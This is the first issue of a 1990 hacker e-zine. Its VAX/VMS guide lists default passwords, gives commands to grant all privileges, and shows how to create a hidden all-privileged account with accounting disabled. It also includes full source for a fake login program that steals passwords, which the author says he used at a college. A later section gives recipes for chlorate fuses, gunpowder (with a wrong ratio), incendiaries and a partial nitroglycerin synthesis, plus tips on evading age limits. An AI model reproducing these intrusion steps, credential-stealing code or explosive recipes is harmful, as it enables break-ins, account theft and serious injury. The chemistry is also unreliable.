1929 lines
84 KiB
Plaintext
1929 lines
84 KiB
Plaintext
----------------------------------------------------------------------------
|
||
| |
|
||
| The Supreme Seven [S7] proudly present... |
|
||
| |
|
||
| ELEKTRIX Issue 1 |
|
||
| |
|
||
| Released May 1990 - Issue 2 in July |
|
||
| |
|
||
| |
|
||
| HACKING * PHREAKING * ANARCHY * ELECTRONIC SURVEILLANCE AND PYROTECHNICS |
|
||
| |
|
||
| |
|
||
| You can contact us at Palm Beach BBS ++44(303)-265979 [Email to Deceptor] |
|
||
----------------------------------------------------------------------------
|
||
|
||
Disclaimer: In no event shall Palm Beach be liable to anyone for special,
|
||
collateral, incidental, or consequential damages in connection with or
|
||
arising out of the use of the information within this magazine and sole
|
||
and exclusive liability to Palm Beach, regardless of any form of action,
|
||
shall not exceed the purchase price of this magazine (which since it is
|
||
nothing means we don't owe u nowt!). Moreover, Palm Beach shall not be
|
||
liable for any claim of any kind whatsoever against the user of these text
|
||
materials by any other party. Palm Beach makes no warranty, either exp-
|
||
ressed or implied, including but not limited to any implied warranties of
|
||
merchantability and fitness for particular purpose, regarding these text
|
||
materials and makes such materials available solely on an 'as-is' basis.
|
||
Now that that's over with - PARTY!
|
||
|
||
Well now, this is the first issue of many ELEKTRIX newsletters covering
|
||
such topics as COMPUTER SECURITY, HACKING, PHREAKING, SAT DECODING, RTTY
|
||
ENCODED CRACKING, MAG.STRIP ENCRYPTION AND SUPPLIES, THE ANARCHISTS GUIDES,
|
||
PYROTECHNICS, ELECTRONIC SURVEILLANCE AND ELECTRONIC FRAUD.
|
||
In this issue there are articles on Hacking, Phreaking, Pyrotechnics,
|
||
anarchy and electronic surveillance. The newsletter is bi-monthly and so
|
||
the next issue will be out in July. You can 'pickup' a copy of ELEKTRIX at
|
||
any of these boards around the world:
|
||
|
||
HACKERNET (UK) ++44(532)-557739
|
||
PALM BEACH BB (UK) ++44(303)-265979
|
||
THE LIMELIGHT BBS (USA) 0101-203-834-0367
|
||
THE PIRATES HAVEN + THE WAREHOUSE BB (EUROPE)
|
||
|
||
If you have an article or some information which you would like to see
|
||
put to use in the next issue then you can contact us at Palm Beach BBS UK.
|
||
Please send all e-mail to Deceptor. Higher priviledges available to hackers
|
||
, phreakers, etc. You can contact S7 at these places too:
|
||
|
||
TCHH - Maxhack/Deceptor/Pop
|
||
QSD - Alex/Maxhack/Deceptor
|
||
GHOST - Mail to S7/Deceptor
|
||
|
||
|
||
<20> Part 1 - Hacking VMS - UAF / False Logon programs, etc. / Pling Wiz
|
||
|
||
<20> Part 2 - The Anarchists guide to...pyrotechnics & mischief / Deceptor
|
||
|
||
<20> Part 3 - An guide to modern electronic surveillance / Technic
|
||
|
||
<20> Part 4 - Make your own tonepad for phone box phreaking / Maxhack
|
||
|
||
<20> Part 5 - Freefone interrogation.....The ultimate in lists. / Agent 7
|
||
|
||
|
||
---------------------- ELEKTRIX ISSUE 1: MAY 1990 ---------------------------
|
||
|
||
|
||
----------------------------------------------------------------------------
|
||
| |
|
||
| ELEKTRIX Issue 1 - Part 1 |
|
||
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
||
| |
|
||
| Hacking VAX/VMS + The User Authorisation File |
|
||
| By Pling Wiz |
|
||
| |
|
||
| PALM BEACH BBS UK ++44(303)-265979 |
|
||
| |
|
||
----------------------------------------------------------------------------
|
||
|
||
|
||
|
||
INTRODUCTION
|
||
|
||
The VAX is made by DEC (Digital Equipment Corp) and can run a variety
|
||
of operating systems. In this file i will talk about the VMS (Virtual
|
||
Memory Operating System), VMS also runs on the PDP-11, both mainframes
|
||
are 32 bit machines with 32 bit virtual address space.
|
||
|
||
ENTRANCE:
|
||
|
||
When you first connect to a VAX you type either a return, a ctrl-c or
|
||
a ctrl-y. It will then respond with something similar to this:
|
||
|
||
USERNAME:
|
||
PASSWORD:
|
||
|
||
The most frequent way of gaining access to a computer is by using a
|
||
'default' password, this by the way is not very successful.......
|
||
When DEC sells a VAX/VMS, the system comes equipped with 4 accounts
|
||
which are:
|
||
|
||
DEFAULT : This serves as a template in creating user records in the
|
||
UAF (User Authorization File). A new user record is assigned
|
||
the values of the default record except where the system
|
||
manager changes those values. The default record can be
|
||
modified but can not be deleted from the UAF.....
|
||
|
||
SYSTEM : Provides a means for the system manager to log in with full
|
||
privileges. The SYSTEM record can be modified but cannot be
|
||
deleted from the UAF.......
|
||
|
||
FIELD : Permits DIGITAL field service personnel to check out a new
|
||
system. The FIELD record can be deleted once the system is
|
||
installed.
|
||
|
||
SYSTEST: Provides an appropriate environment for running the User
|
||
Environment Test Package (UETP). The SYSTEST record can be
|
||
deleted once the system is installed.
|
||
|
||
Usually the SYSTEM MANAGER adds,deletes, and modifies these records
|
||
which are in the UAF when the system arrives, thus eliminating the
|
||
default passwords, but this is not always the case.....
|
||
some default passwords which have been used to get in a system are....
|
||
|
||
USERNAME PASSWORD
|
||
|
||
SYSTEM MANAGER or OPERATOR
|
||
FIELD SERVICE or TEST
|
||
DEFAULT USER or DEFAULT
|
||
SYSTEST UETP or SYSTEST
|
||
|
||
Other typical VMS accounts are :
|
||
VAX
|
||
VMS
|
||
DCL
|
||
DEMO
|
||
GUEST
|
||
GENERAL
|
||
TEST
|
||
HELP
|
||
GAMES
|
||
DECNET
|
||
|
||
Or a combination of the various usernames and passwords. If none of
|
||
these get you in , then you should try another system unless you have
|
||
away of getting an account either by trashing or other means.....
|
||
|
||
YOUR IN!!!!!!
|
||
|
||
You will know that you are in by receiving the prompt of a dollar sign
|
||
($). You will be popped into the default directory which is dependent
|
||
on what account you logged in as. If you get in as system manager
|
||
(highly unlikely) you have full access....
|
||
If you get the FIELD or SYSTEST account , you may or may not have full
|
||
access, but you may have the privileges to give your self full access.
|
||
|
||
To give privs to yourself:
|
||
|
||
$ SET PROCESS/PRIVS=ALL
|
||
|
||
The VMS system has full help files available by typing HELP. You can
|
||
use the wildcard character of an '*' to list out info on every
|
||
command:
|
||
$ help *
|
||
|
||
When you first logon, it may be to your advantage to get a list of all
|
||
users currently logged onto the system if there are any at all. You
|
||
can do this by:
|
||
|
||
$ SHOW USERS
|
||
|
||
VAX/VMS Interactive Users-Total=4
|
||
01-may-1989 11:37:21.73
|
||
0PAO: DEMO 004C004C
|
||
TTD2: FIELD 004E02FF
|
||
TTD1: SYSMAN 0043552E
|
||
TXB3 TRTRTRRTR 01190057
|
||
|
||
It is highly recommended that if you are logged on in the day and
|
||
there are people logged in, especially the system manager or the
|
||
account you are logged on as appears twice.. log out straight away,
|
||
and call back later. You do not want to call to late though as the
|
||
system keeps a record of when each user logs in and out.
|
||
|
||
To communicate with other users or other hackers that are on the
|
||
system, use the PHONE utility..
|
||
|
||
$ PHONE Username
|
||
|
||
If the system has DEC-NET you can see what available nodes there are
|
||
by :
|
||
|
||
$ SHOW NETWORK
|
||
|
||
If you have mail the system will tell you as soon as you logon, simply
|
||
type:
|
||
|
||
$ MAIL
|
||
|
||
This will invoke the Personal Mail Utility, you can then either read
|
||
your mail or select help....
|
||
|
||
DIRECTORIES:
|
||
To see what you have in your directory type:
|
||
|
||
$ DIR
|
||
|
||
To get a list of directories on the system type:
|
||
|
||
$ DIR *.*
|
||
|
||
When a VAX/VMS is first installed, it comes with 9 directories which
|
||
are not listed when you execute the DIR *.* command:
|
||
|
||
<SYSLIB>
|
||
This directory contains various macro and object libraries.
|
||
|
||
<SYSMSG>
|
||
This directory contains files used in managing the operating system.
|
||
|
||
<SYSMGR>
|
||
This directory contains text files and help libraries for the HELP
|
||
library.
|
||
|
||
<SYSERR>
|
||
This is the directory for the error log file (ERRLOG.SYS).
|
||
|
||
<SYSTEST>
|
||
This directory contains files used in testing the functions of the
|
||
operating system.
|
||
|
||
<SYSMAINT>
|
||
This directory contains system diagnostic programs.
|
||
|
||
<SYSUPD>
|
||
This directory contains filesused in applying system updates.
|
||
|
||
<SYSUPD.EXAMPLES>
|
||
This directory contains sample driver programs, user-written system
|
||
services, and other source programs.
|
||
|
||
<SYSEXE>
|
||
This directory contains the executable images of most of the functions
|
||
of the operating system.
|
||
Inside these directoriesare files with the following file types:
|
||
|
||
File-Type: Description: command:
|
||
--------------------------------------------------------------------
|
||
.hlp system help file TYPE filename
|
||
.dat data file TYPE filename
|
||
.msg message file TYPE filename
|
||
.doc Documentation TYPE filename
|
||
.log LOG file TYPE filename
|
||
.err ERROR msg file TYPE filename
|
||
.seq sequential file TYPE filename
|
||
.sys system file FILE-NAME
|
||
.exe executable file FILE-NAME
|
||
.com command file COMMAND NAME
|
||
.bas basic file RUN file-name
|
||
.txt ascii text file TYPE filename
|
||
--------------------------------------------------------------------
|
||
There are others but you won't see them as much as the above. You can
|
||
change the directories either by using the CHANGE command or by using
|
||
the SET DEFAULT command:
|
||
|
||
$ CHANGE <DIR.NAM>
|
||
or
|
||
$ SET DEFAULT <DIR.NAM>
|
||
|
||
You can now list and execute the files in this directory without first
|
||
the directory name followed by the filename as long as you have
|
||
sufficient access. If you don't have sufficient access you can still
|
||
view files within directories that you cannot default to by:
|
||
|
||
$ TYPE <LOD.DIR> LOD.MAI;1
|
||
This will list the contents of the file LOD.MAI;1 in the directory of
|
||
<LOD.DIR>
|
||
|
||
The use of wildcards is very helpful when you desire to view all the
|
||
mail or something on the system. To list out all the users mail if you
|
||
have access type:
|
||
|
||
$TYPE <*.*>*.MAI;*
|
||
|
||
As you may have noticed mail files have the extension of MAI at the
|
||
end. The ;1 or ;2 etc are used to number files with the same name.
|
||
|
||
PRIVILEGES
|
||
|
||
Privileges fall into 7 categories according to the damage that the
|
||
user possessing them could cause to the system:
|
||
|
||
NONE - No privileges
|
||
|
||
NORMAL - minimum privileges to use the system.
|
||
|
||
GROUP - Potential to interfere with members of the same group.
|
||
|
||
DEVOUR - Potential to devour noncritical system-wide resources.
|
||
|
||
SYSTEM - Potential to interfere with normal system operation.
|
||
|
||
FILE - Potential to comprimise file security.
|
||
|
||
ALL - Potential to control the system (wouldn't that be good ahah).
|
||
|
||
THE UAF
|
||
|
||
The User Authorization File contains the names of the users who may
|
||
log into the system and also contains a record of the users
|
||
privileges. Each record in the UAF includes the following:
|
||
|
||
1. Name and Password.
|
||
2. User Identification Code(UIC)-- Identifies a user by a group number
|
||
and a member number.
|
||
3. Default file specification --- Has the default device and directory
|
||
names for file access.
|
||
4. Login command file --- Names a command procedure to be executed
|
||
automatically at login time.
|
||
5. Login flags --- Allows the system manager to inhibit the user of
|
||
the ctrl-y functions and lock user passwords.
|
||
6. Priority ---- Specifies the base priority of the process created
|
||
by the user at login time.
|
||
7. Resources --- Limits the system resources the user may perform.
|
||
8. Privileges --- Limits the activities the user may perform.
|
||
|
||
If you have SYSTEM MANAGER privileges, you will be able to add,delete,
|
||
and modify records in the UAF.
|
||
|
||
The AUTHORIZE Utility allows you to modify the information in the UAF.
|
||
It is usually found in the SYSEXE directory.
|
||
The commands for AUTHORIZE are:
|
||
ADD Username <qualifier..> Adds a record to the UAF.
|
||
EXIT (or CTRL-Z) Returns you to command level.
|
||
HELP Lists the AUTHORIZE commands.
|
||
LIST <Userspec></FULL> Creates a listing file of UAF records.
|
||
MODIFY Username Modifies a record.
|
||
REMOVE Username deletes a record.
|
||
SHOW Displays UAF records.
|
||
|
||
The most useful besides ADD is the SHOW command. SHOW displays reports
|
||
for selected UAF records. YOU can get a /BRIEF listing of a /FULL
|
||
listing. BUT before you do that, you may want to make sure no one is
|
||
logged on besides you,to make sure know one can log on type the
|
||
following:
|
||
|
||
$ SET LOGINS /INTERACTIVE=0
|
||
|
||
This establishes the max number of users able to log in to the system,
|
||
this command does not affect users currently logged on.
|
||
|
||
To list out the userfile do the following:
|
||
|
||
$ SET DEFAULT <SYSEXE>
|
||
$ RUN AUTHORIZE
|
||
UAF> SHOW * /BRIEF
|
||
|
||
UAF
|
||
Unfortunately you cannot get a listing of passwords,though you can get
|
||
a listing of all the users as shown above... The passwords are
|
||
encrypted just like the unix systems.
|
||
If you have sufficient privs you can create your own account.........
|
||
|
||
UAF> ADD <Username> /PASSWORD=HACKER /UIC=<014,006> /CPUTIME=0
|
||
/DEVICE=SYS$ROOT_/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL
|
||
/OWNER=DIGITAL /NOACCOUNTING
|
||
|
||
1. ADD USERNAME
|
||
2. SPECIFY THE PASSWORD YOU WANT TO USE....
|
||
3. ASSIGN A UIC CONSISTS OF 2 NUMBERS FROM 0 TO 377 SEPERATED BY A
|
||
COMMAND ENCLOSED IN BRACKETS....
|
||
4. CPUTIME IS IN DELTA FORMAT, 0 MEANS INFINITE......
|
||
5. SPECIFY THE DEVICE THAT IS ALLOCATED TO THE USER WHEN THEY LOGIN.
|
||
OTHER DEVICES ARE SYS$DEVICE,SYS$SYSDISK ETC..
|
||
6. SPECIFYING AN ACCOUNT IS NOT REALLY NECCESSARY
|
||
7. PRIVS YOU ARE GOING TO WANT ALL THE PRIVS AREN'T YOU???
|
||
8. VERY IMPORTANT.... NOACCOUNTING WILL DISABLE THE SYSTEM ACCOUNTING
|
||
RECORDS,THUS NOT ADDING INFORMATION TO THE ACCOUNTING.DAT FILE.
|
||
|
||
|
||
LOGGING OFF
|
||
Simply type:
|
||
$ LOGOUT
|
||
|
||
|
||
BYPASSING THE UAF...
|
||
=====================
|
||
|
||
|
||
The preferred method of breaking into a locked system is to set the alternat
|
||
UAF. This method requires setting the system parameter UAFALTERNATE, which
|
||
defines the logical name SYSUAF to refer to the file SYS$SYSTEM:SYSUAFALT.DA
|
||
If this file is found during a normal login, the system uses it to validate
|
||
the account and prompts you for the username and password.
|
||
If this file is not located, the system assumes that the UAF is corrupt and
|
||
accepts any username and password to log you into the system from the system
|
||
console. Logins are prohibited from all other locations.
|
||
|
||
NOTE: You can only use this method to log into the system from the console
|
||
terminal; you cannot use the other terminal lines.
|
||
|
||
To set the alternate UAF ,use the following procedure:
|
||
|
||
1: Perform a conversational boot..
|
||
2: When the SYSBOOT > prompt appears, enter the following
|
||
SYSBOOT > SET UAFALTERNATE 1 <cr>
|
||
3: Type CONTINUE and press <cr>
|
||
4: When the start up procedure completes, log in on the console terminal by
|
||
entering any username and password when asked to..
|
||
|
||
The system assigns the following values to your user account:
|
||
|
||
NAME.................. Username.
|
||
UIC................... [001,004].
|
||
COMMAND INTERPRETER... DCL.
|
||
LOGIN FLAGS........... None.
|
||
PRIORITY.............. Value of system parameter (DEFPRI).
|
||
RESOURCES............. Value of the PQL system parameters.
|
||
PRIVILEGES............ ALL.
|
||
|
||
The process name is usually the name of the device on which you logged in
|
||
EG opa0..
|
||
|
||
5: Fix the problem that caused you to be locked out of the system. That is,
|
||
make the necessary repairs to the UAF or to the start up or login
|
||
procedures . (If you modify a login or startup procedure and the problem
|
||
is still not solved, restore procedure to its previous state.
|
||
|
||
If the problem is a forgotten password, reset the UAFALTERNATE system param
|
||
to 0, as explained in the next step. Then enter the authorize utility and
|
||
then type HELP MODIFY for info on modifying passwords...
|
||
|
||
6: Clear the UAFALTERNATE parameter by running SYSGEN and using SYSGEN
|
||
commands. To run SYSGEN, enter the following commands at the DCL prompt:
|
||
|
||
$ RUN SYS$SYSTEM:SYSGEN <CR>
|
||
|
||
The SYSGEN prompt is then displayed, then enter the following commands:
|
||
|
||
SYSGEN > SET UAFALTERNATE 0 <CR>
|
||
SYSGEN > WRITE CURRENT <CR>
|
||
SYSGEN > EXIT <CR>
|
||
|
||
7: Shutdown and reboot the system.
|
||
|
||
Emergency startup after modifying system paramaters.
|
||
|
||
In some cases, modifying system parameters may cause the system to become
|
||
unbootable. If this occurs, use the following emergency startup procedure
|
||
to restore normal operation.....
|
||
|
||
1: Perform a conversational boot....
|
||
2: When the SYSBOOT > prompt appears enter the following commands:
|
||
SYSBOOT > USE DEFAULT.PAR <CR>
|
||
SYSBOOT > CONTINUE <CR>
|
||
3: When the system finishes booting, review any changes you made to SYSGEN
|
||
parameters, modify MODPARAMS.DAT as necessary and re execute AUTOGEN.
|
||
|
||
|
||
BYPASSING STARTUP AND LOGIN
|
||
===========================
|
||
|
||
If the system does not complete the startup procedures or does not allow you
|
||
to log in , bypass the startup and login procedures by following these steps
|
||
|
||
1: Perform a conversational boot..
|
||
2: define the console to be the startup procedure by entering the following
|
||
commands at the SYSBOOT > prompt:
|
||
SYSBOOT > SET/STARTUP OPA0:
|
||
Type continue and press <CR> in response to the next SYSBOOT > prompt.
|
||
Wait for the DCL prompt to return.....
|
||
3: Correct the error condition that caused the login failure. That is, make
|
||
the necessary repairs to the startup or login procedures, or to the UAF.
|
||
You may want to enter the following DCL commands because bypassing the
|
||
startup procedures leaves the system in a partially initialized state:
|
||
|
||
$ SET NOON <CR>
|
||
$ SET DEFAULT SYS$SYSROOT:[SYSEXE] <CR>
|
||
|
||
Invoke a text editor to correct the startup or login procedure file. Note
|
||
that some system consoles may not supply a screen mode editor.
|
||
|
||
4: Reset the startup procedure by invoking SYSGEN and entering the following
|
||
commands:
|
||
|
||
$ RUN SYS$SYSTEM:SYSGEN <CR>
|
||
SYSGEN > SET/STARTUP SYS$SYSTEM:STARTUP.COM <CR>
|
||
SYSGEN > WRITE CURRENT <CR>
|
||
SYSGEN > EXIT <CR>
|
||
|
||
5: Perform a normal startup by entering the following command:
|
||
|
||
$ @SYS$SYSTEM:STARTUP <CR>
|
||
|
||
To perform an orderly shutdown of the system, invoke SHUTDOWN.COM from
|
||
any terminal and any priveleged account with the following DCL command:
|
||
|
||
$ @SYS$SYSTEM:SHUTDOWN <CR>
|
||
|
||
|
||
EMERGENCY SHUTDOWN WITH OPCRASH
|
||
===============================
|
||
|
||
This describes how to halt the system immediately without performing any of
|
||
the functions that ensure an orderly shutdown. You use the OPCRASH procedur
|
||
only if SHUTDOWN.COM FAILS......
|
||
|
||
To perform this procedure you must have CMKRNL privilege. You can enter the
|
||
commands from ANY terminal.
|
||
|
||
1: Enter the following command to force an immediate shutdown of the system
|
||
|
||
$ RUN SYS$SYSTEM:OPCRASH <CR>
|
||
|
||
2: At the system console the following message is displayed
|
||
SYSTEM SHUTDOWN COMPLETE - USE COBSOLE TO HALT SYSTEM.
|
||
|
||
3: Halt the system
|
||
e.g. emergency shutdown using opcrash...
|
||
|
||
$ RUN SYS$SYSTEM:OPCRASH <CR>
|
||
|
||
GENERAL MAINTENANCE OF THE UAF.
|
||
===============================
|
||
|
||
To disable an account use the following command:
|
||
|
||
UAF > MODIFY USERNAME/FLAGS=DISUSER <CR>
|
||
|
||
The login flag disuser disables the account and prevents anyone from loggin
|
||
into the account.
|
||
To enable the account when it is needed, run AUTHORIZE and specify the
|
||
following command:
|
||
|
||
UAF > MODIFY USERNAME/FLAGS=NODISUSER <CR>
|
||
|
||
|
||
MODIFYING A USER ACCOUNT.
|
||
=========================
|
||
|
||
Use the AUTHORIZE command MODIFY to change any of the fields in an existing
|
||
user account. The following command is used to change a users password.
|
||
|
||
UAF> MODIFY USERNAME/PASSWORD=NEWPASSWORD <CR>
|
||
|
||
|
||
LISTING USER ACCOUNTS.
|
||
======================
|
||
|
||
Use the AUTHORIZE command LIST to create the file SYSUAF.LIS containing a
|
||
summary of all user records in the UAF, as follows:
|
||
|
||
UAF > LIST <CR>
|
||
|
||
%UAF-I-LSTMSG1, WRITING LISTING FILE
|
||
%UAF-I-LSTMSG2, LISTING FILE SYSUAF.LIS COMPLETE.
|
||
|
||
By default the LIST command produces a brief report containing the followin
|
||
info from the UAF:
|
||
|
||
ACCOUNT OWNER,USERNAME,UIC,ACCOUNTNAMES,PRIVILEGES,PROCESS PRIORITY,
|
||
DEFAULT DISK AND DIRECTORY.
|
||
|
||
Use the /FULL qualifier to create a full report of all the info contained
|
||
within the UAF.....
|
||
|
||
|
||
ENABLING SECURITY ALARMS.
|
||
=========================
|
||
|
||
To enable security auditing, specify the dcl command SET AUDIT in the
|
||
following format:
|
||
|
||
$ SET AUDIT/ALARM/ENABLE = KEYWORD [...]
|
||
|
||
Select the events to be audited by specifying one or more of the keywords
|
||
to the /ENABLE qualifier....
|
||
|
||
ACL.......... Event requested by an acl on a file or global section..
|
||
ALL.......... All possible events..
|
||
AUDIT........ Execution of the SET AUDIT command..
|
||
AUTHORIZATION modifications to the system UAF file, network proxy,
|
||
authorization file,rights database, or changes to system
|
||
and user passwords..
|
||
BREAKIN...... Successful breakin attempt..
|
||
FILE ACCESS.. Selected types of access (privileged + non privileged) to
|
||
files + global sections..
|
||
INSTALL...... Installation of images..
|
||
LOG FAILURE.. Failed login attempt..
|
||
LOGIN........ Successful login attempt..
|
||
MOUNT........ Volume mounts + dismounts..
|
||
|
||
|
||
ENABLING ALARM MESSAGES
|
||
=======================
|
||
|
||
After you enable a security operator terminal, enable specific alarm events
|
||
with the SET AUDIT/ENABLE qualifier. Alarm messages are then sent to the
|
||
security operator terminal when the selected events occur.
|
||
|
||
|
||
AUDIT REDUCTION FACILITY.
|
||
=========================
|
||
|
||
If you have enabled security alarms, the operating system writes the
|
||
information about these alarms to the security operators log file. To
|
||
extract all of the security alarm info from the current operators log file
|
||
(SYS$MANAGER:OPERATOR.LOG) execute this command:
|
||
|
||
$ @SYS$MANAGER:SECAUDIT <CR>
|
||
|
||
Output from SECAUDIT is displayed on SYS$OUTPUT. If you want to write the
|
||
records to a file, include the file spec with the /OUTPUT qualifier..
|
||
The following command writes the records to the file BREAKINS.DAT in the
|
||
user current directory..
|
||
|
||
|
||
$ @SYS$MANAGER:SECAUDIT/OUTPUT=BREAKINS.DAT
|
||
|
||
|
||
SIMPLE DECOY PROGRAM
|
||
~~~~~~~~~~~~~~~~~~~~
|
||
|
||
This is a decoy program that runs on the vax/vms system..
|
||
It does work because i have used it at the local college of FE, to steal
|
||
passwords and accounts whilst working there....
|
||
|
||
The program now follows:-
|
||
|
||
$ clear
|
||
$ set term/noecho/notype
|
||
$ SYSNAM:=(nodename)
|
||
$begin:
|
||
$ read/error=begin/prompt="" sys$command ret
|
||
$ write sys$output ""
|
||
$ID:
|
||
$ wait 00:00:00.5
|
||
$ write sys$output "*** ''SYSNAM' VAX/VMS SYSTEM ***"
|
||
$ write sys$output ""
|
||
$ write sys$output ""
|
||
$ wait 00:00:01
|
||
$ set term/echo
|
||
$ askquest:
|
||
$ read/error=fail/end=eof/prompt="USERNAME: "/time=20 sys$command quest
|
||
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then SYSNAM:=SYBIL
|
||
$ if f$edit(quest,"upcase") .eqs. "SYBIL" then goto ID
|
||
$ if quest .nes. "" then goto askpass
|
||
$eof:
|
||
$ write sys$output "Error reading command input"
|
||
$ write sys$output "End of file detected"
|
||
$ goto begin
|
||
$fail:
|
||
$ write sys$output "Error reading command input"
|
||
$ write sys$output "Timeout period expired"
|
||
$ goto begin
|
||
$askpass:
|
||
$ set term/noecho
|
||
$ read/error=eof/end=eof/prompt="PASSWORD: " sys$command pass
|
||
$ set term/echo
|
||
$ open/write file data.dat
|
||
$ write file quest
|
||
$ write file pass
|
||
$ write file f$time()
|
||
$ close file
|
||
$ set term/lowercase
|
||
$ write sys$output "User authorization failure"
|
||
$ read/error=begin/prompt ="" sys$command ret
|
||
$ stop/id='f$getjpi("","PID")
|
||
|
||
Notes about use...
|
||
|
||
1... change the welcoming message of the program to what is actually seen
|
||
on your vax...
|
||
|
||
2... why not put at the top of the program the logout procedure of someone
|
||
else.. because a blank screen looks a bit suspicious...
|
||
just copy the log out statement and put it between a sys$output command
|
||
in the program .. not forgetiing to take the clear command out haha
|
||
|
||
|
||
------------------- Palm Beach BBS ++44(303)-265979 ------------------------
|
||
|
||
----------------------------------------------------------------------------
|
||
| |
|
||
| ELEKTRIX Issue 1 - Part 2 |
|
||
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
||
| |
|
||
| The Anarchists guide to...Pyrotechnic mischief |
|
||
| by Deceptor |
|
||
| |
|
||
| PALM BEACH BB UK ++44(303)-265979 |
|
||
| |
|
||
----------------------------------------------------------------------------
|
||
|
||
MDA - (3-4-methylendioxyphenylisopropylamine) takes u higher!
|
||
|
||
|
||
Welcome to this, Issue 1 of Elektrix, and with it Part 1 of the 'anarchists
|
||
guide to...' This first file will contain basic information on pyrotechnics
|
||
and other 'bits n pieces' useful for a good laugh.
|
||
|
||
In this file you will find information on how to make the following:
|
||
|
||
Fuse Paper
|
||
Auto-Firelighters
|
||
Low-explosive: Gunpowder
|
||
Hi-explosive : Nitro-Glycerin
|
||
Hot Stuff
|
||
|
||
|
||
FUSE PAPER
|
||
|
||
Useful for making the fuses for bangers (firecrackers) and other slow-burn
|
||
fuse applications.
|
||
|
||
You will need: Sodium Chlorate - Go to your local gardenshop/centre and ask
|
||
for some Sodium Chlorate weedkiller. You're
|
||
meant to be 18 by law but if you're not it
|
||
doesn't usually stop them selling you it.
|
||
|
||
Newspaper/Tracing Paper
|
||
|
||
The Sodium Chlorate in the weedkiller is unlikely to be more than about 65%
|
||
pure - this is not a problem if you're not worried about how quickly it will
|
||
burn as fuse paper but if you are using the fuses in a lot of wind or are
|
||
going to through them as part of a firecracker you will have to concentrate
|
||
the Sodium Chlorate and remove impurities as much as possible beforehand as
|
||
follows:
|
||
|
||
Make a saturated solution of the weedkiller (ie.dissolve as much of it
|
||
as you can in very hot water) then filter off any remaining crystals.
|
||
Then heat the solution very hot in a dish - then when crystals start
|
||
forming around the rim heat more gently and then leave to cool - after
|
||
some time u will have crystals with gunge all over them - wash them and
|
||
filter off any rubbish.
|
||
|
||
This is really simple to make but quite effective...Just take the Sodium
|
||
Chlorate (pure or weedkiller) and then make a solution of it (put in water).
|
||
Then soak the paper in the water and leave to dry on a radiator.
|
||
|
||
When the paper is dry it will burn with some loud pops and just as fusepaper
|
||
so you have made your own fuses. Now to put the fuses to work....(hehe)
|
||
|
||
|
||
|
||
GUNPOWDER
|
||
|
||
Gunpowder is great stuff - though not really as exciting as plastic or
|
||
high-explosive it can be good fun for fireworks, bangers and not so large
|
||
explosions.
|
||
|
||
You will need: Sulphur - Obtain this from your chemist. Yup! Just ask
|
||
for 'flowers of sulphur' (what a stupid name
|
||
for it!)
|
||
|
||
Carbon - Best just to use crushed charcoal for this.
|
||
|
||
Potassium - Get this from a gardenshop (ask for Saltpetre).
|
||
Nitrate Can also use Sodium Nitrate in 'Weedol weed-
|
||
killer' - but not actually as good.
|
||
|
||
Making gunpowder from this is just too easy.....Just grind each substance
|
||
until it is a fine powder....then mix them in the following ratio:
|
||
|
||
Potassium Nitrate : Sulphur : Carbon
|
||
1 : 3 : 7
|
||
|
||
Once mixed well you have made gunpowder - pack it in a confined space - add
|
||
a fuse with the FUSE PAPER as shown above and you have a 'low-explosive'. It
|
||
can be great fun. If you want to light the gunpowder with a short delay of
|
||
about twenty seconds or so without the need for matches or lighters then use
|
||
a FIRELIGHTER as shown next.
|
||
|
||
|
||
|
||
FIRELIGHTER
|
||
|
||
Not really much to this but useful for delayed firelighting with the use of
|
||
matches or lighting materials.
|
||
|
||
You will need: Glycerin - Get it from your kitchen/medicine drawer.
|
||
|
||
Potassium - This is now more commonly referred to as
|
||
Permanganate potassium (vii) manganate and can be picked
|
||
up at the chemist. If they ask you what you
|
||
want it for just say 'water-purification'.
|
||
|
||
Sugar - If you can't get this; you really are lame!
|
||
|
||
Ok. Take the stuff separately in the following proportions:
|
||
|
||
Glycerin : Potassium Permanganate : Sugar
|
||
3 : 9 : 1
|
||
|
||
Crush the sugar and the glycerin up real well (icing sugar works well) then
|
||
just pour the glycerin on top and watch - change the proportions a bit and
|
||
you can have some real fun - try putting a bit of Sulphur in! Hehehehe You
|
||
can also use this as a detonator for a low-explosives such as gunpowder as
|
||
it doesn't go out easily!!! Also if you get a lot of it and a good ratio it
|
||
can be used as a good smoke bomb for indoors since you can run off and it's
|
||
not going then a minute later there's sweet smoke * EVERYWHERE * and phuck
|
||
it doesn't set most smoke alarm detectors off!
|
||
|
||
|
||
|
||
NITROGLYCERIN
|
||
|
||
Contrary to what people may have told you:
|
||
|
||
1) It's very easy to make (if you have the fractional distillation gear).
|
||
2) It doesn't blow up when you drop it - cos homemade isn't usually pure
|
||
enough.
|
||
|
||
Ok. You will need: Sulphuric Acid - Go to a garage and ask for some battery
|
||
acid or crack open a battery (dumper
|
||
truck batteries are cool - can give 400
|
||
amps current output!!! Whew!) You can
|
||
sometimes get it at harbours.
|
||
|
||
Sodium Nitrate - Weedkiller - this time get the 'WEEDOL'
|
||
one with Sodium Nitrate in it or any one
|
||
with Sodium Nitrate.
|
||
|
||
Glycerin - From kitchen as before.
|
||
|
||
Now the thing with this is that in order to actually MAKE nitroglycerin you
|
||
will need Conc.Nitric acid and Conc.sulphuric as well as the glycerin. The
|
||
sulphuric is easy to do - battery acid is roughly 69% pure - the rest being
|
||
water. The best way to get conc. sulphuric therefore is to heat the acid to
|
||
* VERY * hot (400 degrees plus) and then leave it for a long time until its
|
||
acidity increases a great deal (like well nasty!). Get a litre of Sulphuric
|
||
acid concentrated and store it in a glass bottle. [Wash yer hands too - its
|
||
not nice stuff].
|
||
|
||
Now getting the Nitric acid in any form is well difficult unless you have
|
||
access to it at college/work etc. The best way I've found is to take Sodium
|
||
Nitrate weedkiller and do the following:
|
||
|
||
1) Purify the Sodium Nitrate from the weedkiller by making a saturated soln.
|
||
and then crystallizing it and washing the crystals and filter off any
|
||
nasties...Now you have Sodium Nitrate (reasonably pure).
|
||
|
||
2) Then take the Sodium Nitrate crystals and crush them into a powder or as
|
||
close as you can get.
|
||
|
||
3) Now you want to sort of extract the nitrate - for this you will need fair
|
||
distillation equipment. You are attempting to make Nitric Acid from the
|
||
Sodium Nitrate by reacting it with some of the Sulpluric acid which was
|
||
concentrated from before.
|
||
|
||
i) Pour Sulphuric acid in here
|
||
||
|
||
|D2|___ D5 <- Nasty gases will be coming out of
|
||
